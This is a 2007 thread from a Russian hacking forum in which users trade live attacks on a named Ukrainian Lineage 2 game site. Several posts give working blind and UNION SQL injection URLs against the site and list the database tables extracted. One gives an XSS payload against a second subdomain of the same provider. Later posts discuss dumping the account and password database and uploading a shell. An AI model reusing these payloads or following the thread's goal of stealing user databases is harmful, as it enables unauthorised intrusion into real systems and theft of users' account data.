Форум АНТИЧАТ

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Wnet (https://forum.antichat.xyz/showthread.php?t=43695)

l1ght

04.07.2007 13:45

Wnet

все таки одна скуля нашлась=)

Код:

http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),1,1)))=53/* 5

http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),2,1)))=46/* .

http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),3,1)))=49/* 1

http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),4,1)))=46/* .

http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),5,1)))=49/* 1

http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),6,1)))=54/* 6

http://lineage2.wnet.ua/library/l2dp/item.php?id=2+and(1=(select+1))/*

gratz constantine.

Constantine

04.07.2007 16:57

А чего так криво)) связка операторов union+select вполне функционирует

Код:

http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,version()/*

Какие то такие запросы будут получаться, инфу вывести не сложно

Код:

http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,column_name+from+information_schema.columns+where+table_name=0x4e7063496e666f/*

+toxa+

04.07.2007 17:33

тока никто не учёл такую вещь как user()=L2db@localhost => доступные таблицы это тока те которые относятся к справочной базе=\

Код:

CHARACTER_SETS

COLLATIONS

COLLATION_CHARACTER_SET_APPLICABILITY

COLUMNS

COLUMN_PRIVILEGES

ENGINES

EVENTS

FILES

GLOBAL_STATUS

GLOBAL_VARIABLES

KEY_COLUMN_USAGE

PARTITIONS

PLUGINS

PROCESSLIST

REFERENTIAL_CONSTRAINTS

ROUTINES

SCHEMATA

SCHEMA_PRIVILEGES

SESSION_STATUS

SESSION_VARIABLES

STATISTICS

TABLES

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

TRIGGERS

USER_PRIVILEGES

VIEWS

Armor

ClassStats

Classes

DropLog

Drops

Dropsl2db

EtcItems

GainSkills

GainSkillsLog

IngredientLog

Ingredients

Ingredientsl2db

ItemNames

Items

Locations

Monsters

NpcInfo

NpcLog

NpcNames

QuestDetailLog

QuestDetails

QuestLog

QuestNames

Quests

RecipeLog

Recipes

Recipesl2db

SetItems

Sets

SkillNames

Skills

Stores

SysStrings

Teleports

Weapons

Серенький

05.07.2007 13:37

xss. ';/ фильтруются

Цитата:

http://l2w2new.wnet.ua/UserPanel/showchar.asp?action=search&name=%3CBODY%20onload=a lert(%22xss%22)%3E

helat

05.07.2007 17:09

ТС Базу юзеров ты не сдапиш.
Так как линейка хранит не в мускул а вроде в мсскл

Extremal

05.07.2007 18:53

Цитата:

Сообщение от helat

ТС Базу юзеров ты не сдапиш.
Так как линейка хранит не в мускул а вроде в мсскл

если реч идет о слити данных об акках которые стоят на етом сервере,то я незнаю как етот сервак но я много серваков ставил(у себя на компе)))и все они были на mysql ;)
и вобще с чего вы взяли что базы етого сервака будут на етом сайте???сервак то наверняка стоит у них на компе...

M0rgan

06.07.2007 02:57

Офф на МайСкюл?
какие серваки ты ставил? может явы...
внет считается одним из топ УА сервов ла2...
то что там БД не Мумкул (от серва) гарантирую
+Гмы не настолько там тупы (с виду =))) )
было у мну дело тоже с оффом
вроде все было и уже пассы и доступ... скрипта на "легкое слитие бд" небыло
с МССКЮЛОМ не дружил (увы (( ) да и щас не дружу... так слить базу пассов не удалось...
база с сервом стоят в офисе (хз что и как настроено)
теоретически можно попробовать какимто раком залить шелл (не судите строго не оч разбираюсь)
там уже в конфигурациях или даже просто в файлах (админы любят пассы хранить в текстовиках на роб. столе) узнать все пассы (доступ, назв. баз и тд)
ну а там думать )

строго не судите пост
02.00

Extremal

06.07.2007 12:36

да ты прав я ставил ява серваки...но етот сервак 100% не офф так что база наверняка в мускуле...и если вся база о аккуантах тоже наверняка храниться у них на компе...так что если хотите слить базу нужно пытаться конектиться к кмопу или че то типа етого(я просто представления не имею как ето сделать...)=)т.к. на сайте об базах сервака точно ни че нету

M0rgan

06.07.2007 19:22

слуш почему ты так уверен что это ява то? )
вот сколько лет уже его почемуто оффом называют...
я говорю не к тому чтоб обидеть или еще что-то но просто внет явой быть ну никак не может...
и ставил его поверь мне не ребенок, серв профисиональный,
явы так обычно не работают много показателей...
хотя хз они недавно переезжали вроде, в общем просто хотелось бы услышать почему он ява... просто все время считал его оффом...

сомневаюсь очень крайне что он на мускуле...
ты хоть раз ставил офф?
еще раз вопрос - откуда такие сравнения?
---

n1†R0x

06.07.2007 22:36

Офф на каждом втором серваке сейчас стоит, слили все, кому не лень
По поводу базы: да, в офф-версиях используется Mssql, причем адрес игрового сервера редко совпадает с адресом сервера, где находится/хостится сайт.

Время: 05:06

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице